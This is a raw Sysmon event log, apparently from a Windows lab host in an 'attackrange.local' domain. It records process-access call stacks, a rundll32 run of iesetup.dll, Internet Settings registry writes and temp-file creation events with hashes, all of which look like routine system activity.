12:02:24.375{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.375{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.375{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.375{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.359{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.359{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.359{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.359{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.359{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.359{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.359{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.359{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.359{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+2
4b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000005867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.359{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000005866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.359{266CAFBE-64C5-6064-A700-00000000AE01}43884064C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+b71e|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000005865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.359{266CAFBE-64C5-6064-A700-00000000AE01}43884064C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+b680|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000005864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.343{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64D0-6064-B400-00000000AE01}5196C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.343{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64D0-6064-B400-00000000AE01}5196C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.328{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}5196C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.328{266CAFBE-64C5-6064-A500-00000000AE01}43561176C:\Windows\Explorer.EXE{00000000-0000-0000-0000-000000000000}5196C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+551d34|C:\Windows\System32\SHELL32.dll+551790|C:\Windows\System32\SHELL32.dll+551904|C:\Windows\System32\SHELL32.dll+22dcef|C:\Windows\System32\SHELL32.dll+f539d|C:\Windows\System32\SHELL32.dll+10d421 154100x80000000000000005860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.335{266CAFBE-64D0-6064-B400-00000000AE01}5196C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iesetup.dll",IEHardenUserC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 
13241300x80000000000000005859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:24.312{266CAFBE-64CF-6064-B300-00000000AE01}5164C:\Windows\System32\rundll32.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1809DWORD (0x00000000) 13241300x80000000000000005858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:24.312{266CAFBE-64CF-6064-B300-00000000AE01}5164C:\Windows\System32\rundll32.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1206DWORD (0x00000003) 23542300x80000000000000005857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.312{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIAA0B.tmpMD5=A828B8C496779BDB61FCE06BA0D57C39,SHA256=C952F470A428D5D61ED52FB05C0143258687081E1AD13CFE6FF58037B375364D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.234{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIAA0B.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.219{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA9BC.tmpMD5=3006752A2BCFEDA0F75D551EA656B2EF,SHA256=DFD64231860C732DCED3DC78627A7844A08D5D3E4CD253FD81186BAE33CC368A,IMPHASH=00000000000000000000000000000000falsetrue 
13241300x80000000000000005854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:24.219{266CAFBE-64CF-6064-B300-00000000AE01}5164C:\Windows\System32\rundll32.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500DWORD (0x00000000) 23542300x80000000000000005853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.188{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=653B6096160EC57F7846E116D6C2D715,SHA256=4F2F1D265E00872B7BDE115BABD21E1FF0AA269ECA5F4C1D06B82F8B418C0625,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.156{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA9BC.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.156{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA97C.tmpMD5=3006752A2BCFEDA0F75D551EA656B2EF,SHA256=DFD64231860C732DCED3DC78627A7844A08D5D3E4CD253FD81186BAE33CC368A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.094{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA97C.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.094{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA91E.tmpMD5=3006752A2BCFEDA0F75D551EA656B2EF,SHA256=DFD64231860C732DCED3DC78627A7844A08D5D3E4CD253FD81186BAE33CC368A,IMPHASH=00000000000000000000000000000000falsetrue 